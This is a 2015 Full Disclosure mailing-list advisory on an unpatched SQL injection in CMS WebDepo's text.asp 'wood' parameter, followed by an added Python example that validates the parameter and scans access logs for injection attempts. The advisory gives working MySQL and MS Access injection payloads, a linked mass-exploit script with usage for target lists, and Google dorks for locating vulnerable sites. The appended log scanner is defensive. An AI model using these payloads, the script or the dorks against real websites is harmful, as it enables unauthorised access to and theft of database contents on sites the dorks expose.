Message-ID: <CANogS9jsAfdOabHtbZrMfesj+TbU1N=aZ-9C7o4Y6w=JUsbfJw@mail.gmail.com>
Date: Sat, 28 Mar 2015 02:16:38 -0300
From: INURL Brasil <inurlbr@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] (0DAY) WebDepo -SQL injection / INURL BRASIL

Advisory: SQLi vulnerabilities in the CMS WebDepo application
Affected web application: CMS WebDepo  (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day

==========================
Vulnerability Description:
==========================

CMS WebDepo, a records and client practice management application,
suffers from multiple SQL injection vulnerabilities.

==========================
Technical Details:
==========================
SQL can be injected through the following GET parameter:
Vulnerable GET parameter:     wood=(id)
$wood=intval($_REQUEST['wood'])

==========================
SQL injection vulnerabilities
==========================

Injection is possible through the file text.asp

Exploit-Example:

DBMS: 'MySQL'
Exploit:      +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
 Exploit:
 +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
FROM MSysAccessObjects%16

Ex: http://target.us/text.asp?wood=(id)+Exploit

==========================
SCRIPT EXPLOIT
==========================

http://pastebin.com/b6bWuw7k
--help:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
    php WebDepoxpl.php -t target
    php WebDepoxpl.php -f targets.txt
    php WebDepoxpl.php -t target -p 'http://localhost:9090'

 howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html

==========================
GOOGLE DORK
==========================

inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="

==========================
Solution:
==========================

Sanitizing all requests coming from the client

==========================
Credits:
==========================

Author:         Cleiton Pinheiro / Nick: googleINURL
Blog:           http://blog.inurl.com.br
Twitter:        https://twitter.com/googleinurl
Fanpage:        https://fb.com/InurlBrasil
Pastebin        http://pastebin.com/u/Googleinurl
GIT:            https://github.com/googleinurl
PSS:            http://packetstormsecurity.com/user/googleinurl
YOUTUBE:        http://youtube.com/c/INURLBrasil
PLUS:           http://google.com/+INURLBrasil

==========================
References:
==========================

[1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
[2] https://msdn.microsoft.com/en-us/library/ff648339.aspx

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
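
Added example, not part of the original advisory or the vendor's code: the same rule, "wood must be a plain integer", used both as an input check and as a detection over access logs for past text.asp requests that broke it. The log format (common/combined style), the assumption that wood is a numeric id, and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: `wood` is a numeric record id, as the advisory's intval() line suggests.
WOOD_RE = re.compile(r"[0-9]{1,10}")

def parse_wood(raw):
    """Return the id as int, or None if the value is not a plain integer."""
    if raw is not None and WOOD_RE.fullmatch(raw):
        return int(raw)
    return None

# Assumption: common/combined log format with the request line in double quotes.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def suspicious_requests(log_lines):
    """Return [(line_no, decoded_value)] for text.asp hits whose wood is not an integer."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # Classic ASP paths and query keys are case-insensitive, so compare lowercased.
        if not url.path.lower().endswith("/text.asp"):
            continue
        # parse_qsl decodes '+' and %XX, so encoded payloads are checked in clear form.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == "wood" and parse_wood(value) is None:
                hits.append((no, value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Mar/2015:10:00:01 +0000] "GET /text.asp?wood=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [28/Mar/2015:10:00:05 +0000] "GET /text.asp?wood=42+AND+1=1 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [28/Mar/2015:10:00:09 +0000] "GET /Text.asp?WOOD=42%27 HTTP/1.1" 500 310',
    '198.51.100.7 - - [28/Mar/2015:10:00:12 +0000] "GET /index.asp?wood=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: non-integer wood value {value!r}")
```

Validation of this kind complements, and does not replace, parameterized queries in the application's data access code.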
